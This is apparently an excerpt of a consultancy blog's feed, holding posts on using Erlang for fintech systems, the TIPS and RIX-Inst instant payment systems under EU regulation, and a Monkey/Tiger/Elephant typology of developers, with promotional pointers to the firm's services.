&lt;p&gt;Erlang’s approach provides the advantages of both microservices and monoliths while minimizing their respective drawbacks. With Erlang, you can build a modular system that maintains the simplicity and coherence of a monolith but without the rigidity that typically hampers scalability and flexibility. Each module or service runs independently, enabling faster development and deployment cycles while maintaining robust fault tolerance and scalability.&lt;/p&gt;
&lt;p&gt;The &amp;quot;share-nothing&amp;quot; architecture means that each process has its own memory and does not directly interfere with others. This allows for seamless scalability, as each process can be managed, scaled, or replaced independently, much like a microservices architecture. However, unlike typical microservices, you avoid the significant overhead of managing multiple services, complex inter-service communication, and data consistency across a distributed network.&lt;/p&gt;
&lt;h2 id=&quot;leveraging-erlangs-otp-open-telecom-platform&quot; tabindex=&quot;-1&quot;&gt;Leveraging Erlang’s OTP (Open Telecom Platform)&lt;/h2&gt;
&lt;p&gt;Erlang&#39;s Open Telecom Platform (OTP) is a powerful framework that provides the building blocks needed to create robust, scalable, and fault-tolerant systems. OTP also provides a collection of design principles that guide the development of concurrent and distributed applications.&lt;/p&gt;
&lt;p&gt;A key feature of OTP is its supervision trees, which are designed to monitor processes and automatically restart them if they fail. This fault-tolerance model ensures that the system remains stable even when individual components encounter errors, making it ideal for applications where uptime is non-negotiable.&lt;/p&gt;
&lt;p&gt;Erlang’s OTP framework also supports hot code swapping, enabling developers to update and modify applications without stopping the system. This is particularly valuable in fintech, where continuous deployment and the need for rapid feature updates or security patches are common.&lt;/p&gt;
&lt;h2 id=&quot;best-practices-for-erlang-in-fintech-systems&quot; tabindex=&quot;-1&quot;&gt;Best Practices for Erlang in Fintech Systems&lt;/h2&gt;
&lt;p&gt;To maximize Erlang&#39;s potential in fintech environments, it&#39;s important to adopt certain best practices. Efficient process management should be fully utilized by designing systems where each transaction or user session is isolated. This approach minimizes the impact of any single failure and allows the system to handle high volumes of concurrent transactions without performance degradation.&lt;/p&gt;
&lt;p&gt;Asynchronous messaging should be used wherever possible. In Erlang, processes communicate through message passing, and keeping these messages non-blocking is vital for maintaining low latency and high throughput.&lt;/p&gt;
&lt;p&gt;Hot code swapping should be leveraged to enable rapid deployment of new features, bug fixes, and security updates without causing disruptions.&lt;/p&gt;
&lt;p&gt;Building a distributed architecture is also essential for maximizing Erlang’s benefits in fintech. Erlang&#39;s native support for distributed systems makes it easy to run applications across multiple nodes, which enhances scalability and redundancy.&lt;/p&gt;
&lt;h2 id=&quot;overcoming-common-challenges-when-adopting-erlang&quot; tabindex=&quot;-1&quot;&gt;Overcoming Common Challenges When Adopting Erlang&lt;/h2&gt;
&lt;p&gt;While Erlang offers substantial benefits, some organizations may face perceived challenges when adopting it, such as concerns about a steep learning curve or integrating with existing technology stacks. However, Erlang&#39;s design makes it surprisingly easy to learn for developers who are already proficient in other languages, allowing them to become productive in just a few weeks. The language’s syntax is straightforward, and its functional programming model, while different from imperative styles, is intuitive for developers who are open to thinking in terms of processes and message-passing.&lt;/p&gt;
&lt;p&gt;To overcome initial hesitations, companies should focus on effective onboarding and training. Introducing developers to Erlang through hands-on workshops, guided tutorials, and real-world problem-solving exercises can accelerate the learning process. Engaging experienced Erlang mentors or consultants, such as those from Happi Hacking, can also help flatten the learning curve, providing practical insights and best practices from seasoned professionals. Additionally, leveraging the rich community resources available online-such as forums, open-source projects, and documentation-can support developers in quickly getting up to speed.&lt;/p&gt;
&lt;p&gt;Integrating Erlang with an existing technology stack, which might already include languages like Python, Java, or C#, can also be a concern. However, Erlang is highly interoperable, and its distributed architecture makes it well-suited to work alongside other systems. Hybrid systems where Erlang handles the concurrent and fault-tolerant components while other languages manage user interfaces, reporting, or legacy functions are feasible. APIs, middleware, and libraries help ensure that Erlang-based applications communicate effectively with existing systems. Erlang’s compatibility with Elixir also offers a pathway for organizations to gradually adopt Erlang’s strengths while leveraging their existing development talent.&lt;/p&gt;
&lt;p&gt;Performance tuning is another area where developers may initially struggle, but Erlang provides powerful and well-documented tools and techniques for optimization. Regular monitoring using tools like &lt;code&gt;observer&lt;/code&gt; and &lt;code&gt;recon&lt;/code&gt;, along with proactive performance adjustments such as garbage collection tuning and optimizing process handling, can significantly improve system performance. Encouraging developers to experiment with these tools and techniques in controlled environments can help build confidence and expertise.&lt;/p&gt;
&lt;h2 id=&quot;the-future-of-erlang-in-fintech&quot; tabindex=&quot;-1&quot;&gt;The Future of Erlang in Fintech&lt;/h2&gt;
&lt;p&gt;As fintech continues to evolve, the demand for systems that are both highly scalable and resilient will only increase. Erlang is well-positioned due to its strengths in managing concurrency, fault tolerance, and distributed computing. The future of Erlang in fintech looks promising, particularly as financial services continue to shift towards real-time transactions, greater automation, and increasingly complex regulatory requirements.&lt;/p&gt;
&lt;p&gt;One area where Erlang is expected to shine is in real-time payments and settlement systems. As instant payments become more ubiquitous, the need for reliable, low-latency processing will grow. Erlang&#39;s capabilities align perfectly with this need, making it an ideal choice for powering back-end systems that handle high-frequency trading, cross-border payments, and instantaneous currency exchanges. Moreover, as digital currencies and blockchain technology gain traction, Erlang&#39;s ability to handle large volumes of transactions in a secure and efficient manner will make it a valuable tool for developing and managing blockchain nodes and decentralized finance (DeFi) platforms.&lt;/p&gt;
&lt;p&gt;Erlang is also likely to find increased application in the realm of artificial intelligence (AI) and machine learning (ML) within fintech. With its strong support for real-time data processing and distributed computing, Erlang can be used to build AI-driven analytics platforms that detect fraud, predict market trends, and enhance customer experiences. As the financial industry increasingly adopts AI and ML for real-time decision-making, Erlang&#39;s unique advantages in handling large-scale, real-time data flows will become even more relevant.&lt;/p&gt;
&lt;p&gt;The potential for Erlang to integrate with emerging technologies, such as edge computing, also positions it well for future growth. As the fintech industry continues to innovate, Erlang&#39;s flexibility and adaptability will make it a suitable choice for companies looking to stay ahead of technological trends. Its compatibility with Elixir-a language designed for scalable web development-further broadens its applicability in developing customer-facing platforms that require real-time data processing and high concurrency.&lt;/p&gt;
&lt;p&gt;Looking ahead, I hope to see more fintech companies recognize the unique advantages of Erlang and consider it as a strategic choice for building their systems. With its proven capabilities in delivering reliability, scalability, and performance, Erlang has the potential to become a key technology for those seeking to build robust, high-volume transaction systems.&lt;/p&gt;
&lt;h2 id=&quot;conclusion-and-call-to-action&quot; tabindex=&quot;-1&quot;&gt;Conclusion and Call to Action&lt;/h2&gt;
&lt;p&gt;Erlang offers a powerful solution for fintech companies aiming to build reliable, scalable systems capable of handling high transaction volumes. Its unique features, such as fault tolerance, real-time performance, and efficient process management, make it an ideal choice for the evolving needs of the financial sector. As real-time payments, AI-driven analytics, and advanced technology integration continue to shape the future of fintech, Erlang&#39;s relevance will only grow.&lt;/p&gt;
&lt;p&gt;I hope more fintech companies will explore the benefits of using Erlang to optimize their systems, leveraging its strengths to stay competitive and meet the demands of an ever-changing market. If you&#39;re looking to harness Erlang&#39;s potential, Happi Hacking can provide expert consultancy services to guide you in building high-performance systems. Additionally, Kindio is available to assist with managing Euro and SEK transactions, ensuring compliance and efficiency.&lt;/p&gt;
&lt;p&gt;To deepen your understanding of Erlang and its applications, check out these resources:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://happihacking.com/resources/the-beam-book/&quot;&gt;The BEAM Book&lt;/a&gt;:&lt;/strong&gt; A comprehensive guide to the Erlang virtual machine, ideal for developers looking to get started with or deepen their knowledge of Erlang.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2024/designing_concurrency/&quot;&gt;Designing Concurrency: The Erlang Way&lt;/a&gt;:&lt;/strong&gt; An article that dives into the principles of designing concurrent applications using Erlang, providing practical insights and examples.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2023/neural_networks_elixir/&quot;&gt;Neural Networks in Elixir&lt;/a&gt;:&lt;/strong&gt; Explore how Elixir, a language built on the Erlang VM, can be used for building scalable machine learning applications.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2023/delta/&quot;&gt;Delta: Designing Financial Systems for Performance&lt;/a&gt;:&lt;/strong&gt; An article discussing the principles of designing high-performance financial systems, relevant to those using Erlang in fintech.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://aeternity.com/&quot;&gt;Aeternity Blockchain&lt;/a&gt;:&lt;/strong&gt; Learn about Aeternity, a blockchain platform that uses Erlang for its backend, highlighting the language’s applications in blockchain technology.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://x.com/guieevc/status/1002494428748140544&quot;&gt;Erlang powering Internet on Twitter&lt;/a&gt;:&lt;/strong&gt; Cisco telling the world that Erlang controls the Internet.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Feel free to explore these resources to get a deeper understanding of Erlang and how it can be applied to solve complex challenges in the fintech world. Reach out to &lt;a href=&quot;mailto:info@happihacking.se&quot;&gt;Happi Hacking&lt;/a&gt; or &lt;a href=&quot;mailto:hello@kindio.se&quot;&gt;Kindio&lt;/a&gt; for more personalized guidance and to discuss how we can support you in building efficient, reliable fintech systems.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>TIPS and RIX-Inst: Navigating the Future of Real-Time Payments in the EU</title>
    <link href="https://happihacking.com/blog/posts/2024/tips/"/>
    <updated>2024-09-03T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2024/tips/</id>
    <summary>Opportunities and Challenges for Fintech Companies</summary>
    <content type="html">&lt;div style=&quot;width: 98%; text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/castle.jpg&quot; alt=&quot;The Crypto Castle, photo E. Stenman&quot; style=&quot;width: 100%; object-fit: contain;&quot; title=&quot;The Crypto Castle, photo E. Stenman&quot; /&gt; &lt;/div&gt;
&lt;p&gt;In Europe, the way people pay for things is changing.
Real-time payment systems that allow instant transfers are becoming the standard.
Sweden is leading this transformation with Swish,
a popular mobile payment platform that has revolutionized everyday transactions
by offering instant, secure payments between individuals and businesses.
Systems like TIPS (TARGET Instant Payment Settlement), and RIX-Inst in Sweden,
are further driving the shift towards real-time payments across the continent.&lt;/p&gt;
&lt;p&gt;The European Union is introducing new directives that impact how fintech companies
must operate within this environment.
In this post, we will give an overview of what TIPS and RIX-Inst mean for the future of real-time payments,
the technical and operational requirements for integrating these systems,
and how to navigate the latest EU directives to ensure compliance and competitiveness.&lt;/p&gt;
&lt;h2 id=&quot;understanding-tips-and-rix-inst&quot; tabindex=&quot;-1&quot;&gt;Understanding TIPS and RIX-Inst&lt;/h2&gt;
&lt;p&gt;TIPS and RIX-Inst are instant payment systems that enable real-time,
round-the-clock fund transfers between European banks and financial institutions.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;TIPS (TARGET Instant Payment Settlement):&lt;/strong&gt;
Launched by the European Central Bank (ECB) in 2018, TIPS is part of the TARGET services. It allows payment service providers to transfer funds across Europe in seconds, 24/7, regardless of the time, day, or public holidays. TIPS ensures immediate settlement of payments directly in central bank money, which minimizes counterparty risk and enhances security and trust in the payment process.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;RIX-Inst:&lt;/strong&gt;
Operated by the Swedish central bank, Sveriges Riksbank, RIX-Inst is the Swedish equivalent of TIPS. It provides instant settlement for payments in Swedish kronor (SEK). It aims to meet the growing demand for immediate payments in Sweden, where consumers and businesses expect their financial transactions to be processed instantly and securely.&lt;/p&gt;
&lt;p&gt;TIPS and RIX-Inst are critical components of the EU&#39;s vision for a Single Euro Payments Area (SEPA), where cross-border payments within the Eurozone are as simple, fast, and cost-effective as domestic payments.&lt;/p&gt;
&lt;h2 id=&quot;key-features-and-benefits&quot; tabindex=&quot;-1&quot;&gt;Key Features and Benefits&lt;/h2&gt;
&lt;p&gt;Real-time payment systems like TIPS and RIX-Inst facilitate immediate funds transfers, reducing settlement risk and enhancing liquidity for financial institutions. They offer 24/7 availability, allowing transactions any day or night, which provides convenience and flexibility to customers and businesses.
TIPS also allows for cross-border transactions across the Eurozone,
while RIX-Inst focuses on the Swedish market with potential future integration possibilities.
Settling payments in central bank money eliminates counterparty risk, ensuring greater security and trust.&lt;/p&gt;
&lt;h2 id=&quot;technical-and-operational-requirements-for-integration&quot; tabindex=&quot;-1&quot;&gt;Technical and Operational Requirements for Integration&lt;/h2&gt;
&lt;p&gt;Integrating with TIPS or RIX-Inst requires a solid understanding of both the technical and operational landscapes.
Payment service providers must implement and maintain APIs that meet the requirements set by the ECB for TIPS or the Riksbank for RIX-Inst, ensuring compatibility with ISO 20022 messaging standards, the global standard for financial messages.
The systems must handle large volumes of data and transactions quickly without compromising accuracy or security.&lt;/p&gt;
&lt;p&gt;Ensuring security is crucial for instant payment systems. Institutions must implement robust encryption, multi-factor authentication, and secure coding practices to protect against fraud and data breaches. Compliance with local and international regulations, such as PSD2 (Payment Services Directive 2), requires secure communication channels and strong customer authentication (SCA).&lt;/p&gt;
&lt;p&gt;The underlying IT infrastructure must support high availability, low latency, and scalability to handle peak transaction loads. I plan to write more about this in a future blog post.&lt;/p&gt;
&lt;h2 id=&quot;regulatory-compliance-and-adherence-to-new-eu-directives&quot; tabindex=&quot;-1&quot;&gt;Regulatory Compliance and Adherence to New EU Directives&lt;/h2&gt;
&lt;p&gt;The European Union has introduced several new directives that impact real-time payment systems like TIPS and RIX-Inst. Key among these are the revised Payment Services Directive (PSD2), the upcoming Digital Operational Resilience Act (DORA), the Market in Crypto-assets Regulation (MiCA), and the Instant Payments Regulation (IPR).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;PSD2 (Revised Payment Services Directive):&lt;/strong&gt; PSD2 has fundamentally reshaped the payment services industry by promoting competition, innovation, and transparency. It mandates open banking, where banks must share customer data with third-party providers (with customer consent) via APIs. For fintech companies, this means ensuring compliance with PSD2 requirements, particularly in secure communication, strong customer authentication, and transparency.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;DORA (Digital Operational Resilience Act):&lt;/strong&gt; Expected to be fully in force by 2025, DORA aims to bolster financial institutions&#39; operational resilience against digital risks. It requires firms to ensure that their ICT systems can withstand, respond to, and recover from all ICT-related disruptions and threats. For companies integrating with TIPS or RIX-Inst, DORA compliance will involve strengthening cybersecurity measures, implementing robust risk management frameworks, and undergoing regular digital resilience testing.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;MiCA (Market in Crypto-assets Regulation):&lt;/strong&gt; MiCA provides a regulatory framework for digital assets, including cryptocurrencies, across the EU. While not directly related to TIPS and RIX-Inst, MiCA could impact fintech firms exploring blockchain or cryptocurrency integrations with instant payment systems. Companies must understand how MiCA’s provisions may affect their digital asset strategies and ensure compliance where relevant.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;IPR (Instant Payments Regulation):&lt;/strong&gt; The Instant Payments Regulation (IPR) aims to make instant payments in the euro currency universally available across the European Union. It builds on the existing Single Euro Payments Area (SEPA) Regulation to ensure that all payment service providers offer instant payment services in the euro, making it mandatory for these services to be accessible, affordable, and secure. IPR requires that the cost of an instant payment should not exceed that of a regular credit transfer, and it mandates that providers screen transactions against sanctions lists at least daily. For fintech companies, aligning with IPR means ensuring their systems can process instant payments in compliance with these new rules, potentially expanding their market reach while maintaining competitive pricing and robust security standards.&lt;/p&gt;
&lt;h2 id=&quot;implementing-the-new-eu-directives&quot; tabindex=&quot;-1&quot;&gt;Implementing the New EU Directives&lt;/h2&gt;
&lt;p&gt;Fintech companies should stay updated on regulatory changes by regularly monitoring updates from the European Central Bank, the European Banking Authority, and other relevant regulatory bodies. Developing flexible compliance frameworks that can quickly adapt to new regulations is crucial, and leveraging technologies like AI and machine learning to monitor transactions, automate compliance checks, and enhance fraud detection capabilities will help.&lt;/p&gt;
&lt;h1 id=&quot;opportunities-for-fintech-companies&quot; tabindex=&quot;-1&quot;&gt;Opportunities for Fintech Companies&lt;/h1&gt;
&lt;p&gt;Integrating with real-time payment systems offers several opportunities for fintech companies to enhance their market position and drive growth. One key advantage is the ability to provide an improved customer experience by offering immediate fund transfers with unparalleled speed and convenience. As consumers increasingly expect instant transactions, fintech companies that adopt these systems can differentiate themselves with faster, more efficient payment services, boosting customer satisfaction and loyalty. Additionally, integrating with TIPS facilitates seamless cross-border transactions within the Eurozone, enabling companies to expand their service offerings to a broader audience without costly infrastructure adjustments. This ability to reach new markets supports international growth strategies and attracts new customers, strengthening a company’s competitive edge.&lt;/p&gt;
&lt;p&gt;Moreover, by adopting TIPS and RIX-Inst, fintech companies can reduce operational costs and risks. Settling payments in central bank money minimizes counterparty risk, lowering the need for expensive risk management processes and freeing up capital for innovation and growth. Real-time settlements also improve cash flow management and provide better company and customer liquidity. Aligning with EU directives such as PSD2, DORA, and MiCA further enhances a company&#39;s secure, reliable, and future-ready reputation, building trust with customers, partners, and regulators. Proactive compliance avoids legal penalties and creates opportunities for new products and services that cater to the growing demand for instant payments, such as premium real-time payment options or innovative mobile solutions. This way, fintech companies can secure new revenue streams, strengthen fraud prevention and security, and leverage advanced technologies like AI and blockchain to stay at the forefront of innovation.&lt;/p&gt;
&lt;h1 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h1&gt;
&lt;p&gt;Adopting real-time payment systems such as TIPS and RIX-Inst is a big change for the European fintech sector. It offers new chances for innovation, efficiency, and growth. However, integrating these systems comes with challenges, particularly regarding new EU directives like IPR, PSD2, DORA, and MiCA.
Fintech companies that proactively adopt these systems and align with regulations are better positioned to capitalize on growth opportunities and stay ahead of the competition.
If your organization is ready to integrate with TIPS and RIX-Inst but needs expert guidance, contact &lt;a href=&quot;https://kindio.se/&quot;&gt;Kindio&lt;/a&gt;. This instructing party can help you seamlessly implement these real-time payment systems. Contact Kindio today to learn how they can support your transition to instant payments and help you comply with the latest EU regulations.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Developer Types</title>
    <link href="https://happihacking.com/blog/posts/2024/the_elephant/"/>
    <updated>2024-05-15T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2024/the_elephant/</id>
    <summary>Addressing the Elephant in the Room</summary>
    <content type="html">&lt;img class=&quot;img-blog &quot; src=&quot;https://happihacking.com/images/animal_developers.png&quot; alt=&quot;A creative office scene showing three developers represented as animals, each facing their computer screens.&quot; title=&quot;A creative office scene showing three developers represented as animals, each facing their computer screens.&quot; /&gt;
&lt;div class=&quot;txt-centered&quot;&gt;The prototyping Monkey is a bit sceptical because he got two managers instead of developers to take over his product...&lt;/div&gt;
&lt;p&gt;In a &lt;a href=&quot;https://happihacking.com/blog/posts/2024/team_performace/&quot;&gt;recent blog post&lt;/a&gt;  I explored team performance in software development. Following this, I received a question on LinkedIn about strategies to enhance team cohesion and motivation. My response highlighted an analogy by Mike Williams, categorizing programmers as Monkeys, Tigers, and Elephants.
This analogy, drawn from Mike Williams&#39; presentation, &lt;a href=&quot;https://www.youtube.com/watch?v=YULFQw686JY&quot;&gt;How Not to Run a Software Project&lt;/a&gt;, is valuable for understanding software development team dynamics.&lt;/p&gt;
&lt;p&gt;In this post, I will expand upon this analogy and explore how recognizing these programmer types can significantly improve team effectiveness and project management. In his talk, Mike Williams emphasizes that developers who specialize in prototyping, making, and maintaining products have distinct skills and mindsets.&lt;/p&gt;
&lt;p&gt;In the initial stage, when you start from a blank slate, you require developers adept at navigating uncertainty and swiftly adapting to changing needs. Like &#39;Monkeys&#39; in Mike&#39;s analogy, these developers are innovators at heart. They excel in environments that demand creativity and the ability to change and adapt.&lt;/p&gt;
&lt;p&gt;As the project moves from prototype to production, the role shifts to developers who mirror the characteristics of &#39;Tigers.&#39; This phase needs individuals who can focus intensely and drive the project forward precisely. These developers refine the initial prototypes into fully functional products, ensuring that every aspect is optimized and scalable for market readiness.&lt;/p&gt;
&lt;p&gt;Once the product is launched, the focus turns to maintenance, a task suited to consistent and reliable developers, like &#39;Elephants.&#39; These developers are crucial for a product&#39;s long-term success as they manage updates, fix bugs, and make iterative improvements based on user feedback. Their thorough understanding of the product and its underlying architecture enables them to enhance its stability and functionality over time.&lt;/p&gt;
&lt;h2 id=&quot;prototyping-a-product-and-the-monkey-developer&quot; tabindex=&quot;-1&quot;&gt;Prototyping a Product and the Monkey Developer&lt;/h2&gt;
&lt;h3 id=&quot;phase-description&quot; tabindex=&quot;-1&quot;&gt;Phase Description&lt;/h3&gt;
&lt;p&gt;Prototyping a product is the early stage of software development, in which the focus is on turning concepts into software. This phase is marked by a high degree of inventiveness and agility. Developers in this stage are expected to embrace uncertainty and experiment with new ideas and approaches. The nature of this work demands frequent iterations and a willingness to discard or reshape ideas as they evolve. This phase often produces incomplete solutions that are not ready for production. Developers here are comfortable working with prototypes that only cover some functionalities and only handle very specific cases. The key is to develop enough to test theories and gain valuable insights without expecting perfection.&lt;/p&gt;
&lt;h3 id=&quot;team-composition-and-qualities&quot; tabindex=&quot;-1&quot;&gt;Team Composition and Qualities&lt;/h3&gt;
&lt;p&gt;The team typically comprises a small group (fewer than 8 members) of highly autonomous and egocentric individualists. These members are often good developers with extensive technological knowledge. They are pioneers who thrive on challenges and are continuously pushing the boundaries of what&#39;s technologically feasible. Their work is driven by a passion for innovation and a desire to explore new territories without the constraints of fully finalized solutions.&lt;/p&gt;
&lt;h3 id=&quot;animal-metaphor-monkey&quot; tabindex=&quot;-1&quot;&gt;Animal Metaphor - Monkey&lt;/h3&gt;
&lt;p&gt;The Monkey metaphor encapsulates the spirit of the prototyping phase. Monkeys are playful, agile, and intelligent, characteristics that are crucial for developers during this early and fluid stage of product development. Known for their quick adaptability and innovative problem-solving skills, monkeys aptly represent developers who are adept at navigating the often chaotic and unpredictable challenges of creating new technologies. Their ability to swiftly adapt and pivot as needed aligns well with the demands of prototyping, where flexibility and rapid iteration are more critical than perfection and completeness.
They are also a bit careless and don’t worry too much if things work out or not.&lt;/p&gt;
&lt;h3 id=&quot;a-real-life-monkey&quot; tabindex=&quot;-1&quot;&gt;A Real-Life Monkey&lt;/h3&gt;
&lt;p&gt;I am a Monkey developer. I can quickly jump from a crazy idea to code. I usually have a proof of concept working in a few hours or days.
Well, when I say working, some code works for the happy path, and if the moon is in the right place, you can demo it to people, and it looks ok. But don&#39;t let anyone else use the product because things will fall apart if you do anything outside the demo specification. And don&#39;t let anyone look at the code because it has been thrown together as a series of experiments where the concepts have shifted while I have discovered the problem domain. The naming is inconsistent at best, and only the most obvious cases are handled.&lt;/p&gt;
&lt;div class=&quot;txt-centered&quot;&gt;
  &lt;img class=&quot;img-blog &quot; src=&quot;https://happihacking.com/images/happi_monkey.jpg&quot; alt=&quot;Me as a Happy monkey.&quot; style=&quot;width: 50%; object-fit: contain;&quot; title=&quot;Me as a Happy monkey.&quot; /&gt;
  &lt;br /&gt;
  Monkey me.
&lt;/div&gt;
&lt;h2 id=&quot;making-a-product-and-the-tiger-developer&quot; tabindex=&quot;-1&quot;&gt;Making a Product and the Tiger Developer&lt;/h2&gt;
&lt;h3 id=&quot;phase-description-1&quot; tabindex=&quot;-1&quot;&gt;Phase Description&lt;/h3&gt;
&lt;p&gt;The Making a Product phase shifts from conceptual prototyping to focused development, aiming to transform early prototypes into reliable, scalable, and production-ready software. This stage requires high precision as developers refine and optimize their initial ideas into a cohesive product that meets specific market and functional requirements. It is characterized by structured development, stringent testing, and a systematic approach to ensure that all elements of the software function seamlessly together. The goal is to solidify the architecture, enhance features, and prepare the product for deployment, adhering to industry standards and user expectations.&lt;/p&gt;
&lt;h3 id=&quot;team-composition-and-qualities-1&quot; tabindex=&quot;-1&quot;&gt;Team Composition and Qualities:&lt;/h3&gt;
&lt;p&gt;This phase typically involves larger teams than the prototyping stage but still operates under the guidance of focused, driven individuals who excel in project management and detail-oriented tasks. The team members, often resembling Tigers in their work style, are known for their tenacity and ability to drive projects to completion. They focus on achieving goals and are adept at navigating the complexities of turning a rough concept into a polished product. These developers are critical thinkers who can execute precise adjustments and optimizations to enhance product performance and reliability.&lt;/p&gt;
&lt;h3 id=&quot;animal-metaphor-tiger&quot; tabindex=&quot;-1&quot;&gt;Animal Metaphor - Tiger:&lt;/h3&gt;
&lt;p&gt;The Tiger metaphor is apt for developers in the Making a Product phase due to the tiger&#39;s focus, strength, and determination attributes. Just as a tiger hunts with precision and does not waver from its target, Tiger developers focus on their objectives, tackling each task with intensity and a clear vision of the end goal. Their strategic approach and powerful presence are essential in ensuring the project progresses steadily toward completion, mirroring the tiger&#39;s role in maintaining control and leading the pack through the development jungle. This phase demands resilience and a commanding grasp of software development&#39;s technical and managerial aspects, qualities that Tiger developers embody perfectly.&lt;/p&gt;
&lt;h3 id=&quot;a-real-life-tiger&quot; tabindex=&quot;-1&quot;&gt;A Real-Life Tiger&lt;/h3&gt;
&lt;p&gt;My good friend and often co-worker Tobias Lindahl is an excellent example of a Tiger programmer. When we work together on a project, he picks up where I left off-grumbling about shoveling through my s**t. He dots the i&#39;s and crosses the t&#39;s, handling all the errors and non-trivial cases I skipped. Tobias has the patience to think through all possible problems and solutions, and then he transforms my mockup or proof of concept into a genuine product.&lt;/p&gt;
&lt;p&gt;He can not stand broken or unfinished things. He likes to fix things at home, in the office, and in code. He wears cargo pants and brings a screwdriver with him everywhere.&lt;/p&gt;
&lt;h2 id=&quot;maintaining-a-product-and-the-elephant-developer&quot; tabindex=&quot;-1&quot;&gt;Maintaining a Product and the Elephant Developer&lt;/h2&gt;
&lt;h3 id=&quot;phase-description-2&quot; tabindex=&quot;-1&quot;&gt;Phase Description:&lt;/h3&gt;
&lt;p&gt;The Maintaining a Product phase focuses on the long-term sustainability and evolution of the software after its launch. This stage involves continuous monitoring, updating, and enhancing the product to ensure it remains relevant, functional, and competitive. Developers in this phase are tasked with addressing bugs, implementing enhancements based on user feedback, and adapting the product to new technologies or market conditions. This phase is crucial for ensuring the software&#39;s stability and extending its life cycle through careful, incremental improvements and meticulous attention to detail.&lt;/p&gt;
&lt;h3 id=&quot;team-composition-and-qualities-2&quot; tabindex=&quot;-1&quot;&gt;Team Composition and Qualities:&lt;/h3&gt;
&lt;p&gt;The team in this phase generally consists of dedicated, experienced developers capable of deep focus and a thorough understanding of the product’s history and underlying architecture. Often referred to as Elephant developers, these individuals are known for their reliability, methodical approach, and memory for detail. They are adept at managing complex systems and can navigate large codebases to diagnose and fix issues effectively. Their work ensures the product’s performance is consistently optimized and adapts over time to meet evolving user needs.&lt;/p&gt;
&lt;h3 id=&quot;animal-metaphor-elephant&quot; tabindex=&quot;-1&quot;&gt;Animal Metaphor - Elephant:&lt;/h3&gt;
&lt;p&gt;The Elephant metaphor captures the essence of developers in the Maintaining a Product phase. Elephants are renowned for their intelligence, memory, and stability-indispensable for maintaining complex software systems. Like elephants, these developers are calm, patient, and capable of handling large-scale tasks that require a long-term commitment and a detailed understanding of past interactions within the system. Their role is less about rapid innovation and more about consistency, reliability, and gradual enhancement. They bring wisdom and foresight to the development team, making strategic decisions that impact the product’s future viability and success.&lt;/p&gt;
&lt;h3 id=&quot;a-real-life-elephant&quot; tabindex=&quot;-1&quot;&gt;A Real-Life Elephant&lt;/h3&gt;
&lt;p&gt;My friend and colleague Richard Carlsson embodies the mindset and abilities of an Elephant developer, excelling in software development&#39;s maintenance and enhancement phase. Maintainers like Richard possess meticulous attention to detail and a deep understanding of the systems they work with. He often invest significant time in comprehending a system thoroughly before implementing any changes. Then, when he knows what he is doing, he is known for being willing to modify all files in an entire system to ensure proper naming conventions and improve code clarity.&lt;/p&gt;
&lt;p&gt;His ability to delve deeply into a codebase&#39;s intricacies allows him to make informed and thoughtful changes, minimizing the risk of introducing new issues while resolving existing ones. Elephant developers like Richard prioritize stability, reliability, and efficiency. They have a keen eye for detail and a strong sense of responsibility towards the systems they manage. They focus on ensuring that software continues to meet user needs and adapts to evolving requirements while maintaining a high standard of code quality. Because of the time invested in understanding a system and domain, replacing a good maintainer is hard and expensive.&lt;/p&gt;
&lt;img class=&quot;img-blog &quot; src=&quot;https://happihacking.com/images/animal_developers_proper_clothes.png&quot; alt=&quot;A creative office scene showing three developers represented as animals, with t-shirs and cargo pants.&quot; title=&quot;A creative office scene showing three developers represented as animals, with t-shirs and cargo pants.&quot; /&gt;
&lt;div class=&quot;txt-centered&quot;&gt;Now we have a proper team...&lt;/div&gt;
</content>
  </entry>
  
  <entry>
    <title>The Quest for Enhanced Productivity in Software Development</title>
    <link href="https://happihacking.com/blog/posts/2024/team_performace/"/>
    <updated>2024-04-28T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2024/team_performace/</id>
    <summary>A Reflection One and a Half Decades Later</summary>
    <content type="html">&lt;img class=&quot;img-blog &quot; src=&quot;https://happihacking.com/images/Happi_talks3.jpg&quot; alt=&quot;Happi with a whiteboard in the background.&quot; title=&quot;Happi with a whiteboard in the background.&quot; /&gt;
&lt;p&gt;In late 2009, Sebastian Siemiatkowski, the CEO of Klarna, and I embarked on a series of enlightening discussions with leading technology companies in Stockholm, including Google, Tail-f, Pricerunner, Dice, Avanza, Ericsson, Bwin, and Virtutech. Our aim was to understand how successful companies cultivate their teams, enhance productivity, and manage their processes by understanding their corporate culture, strategies, and management practices.&lt;/p&gt;
&lt;p&gt;Our conversations revealed a universal problem within the industry: defining and measuring productivity. From Google to Ericsson, every company seemed to grapple with similar questions-How do we measure productivity effectively? How do we set meaningful goals? What best motivates our developers? And crucially, how do we attract and retain top talent?
The challenge of measuring productivity proved to be the most formidable. Mike Williams from Ericsson suggested that productivity isn&#39;t always quantifiable in objective terms; instead, it demands a managerial perspective that’s partly subjective. Ericsson, for instance, tracks metrics like hours spent per bug as a measure of quality. On the other hand, Google employs a peer review system where developers are assessed by their teammates, underscored by a dual reward system that motivates individual and team performance.&lt;/p&gt;
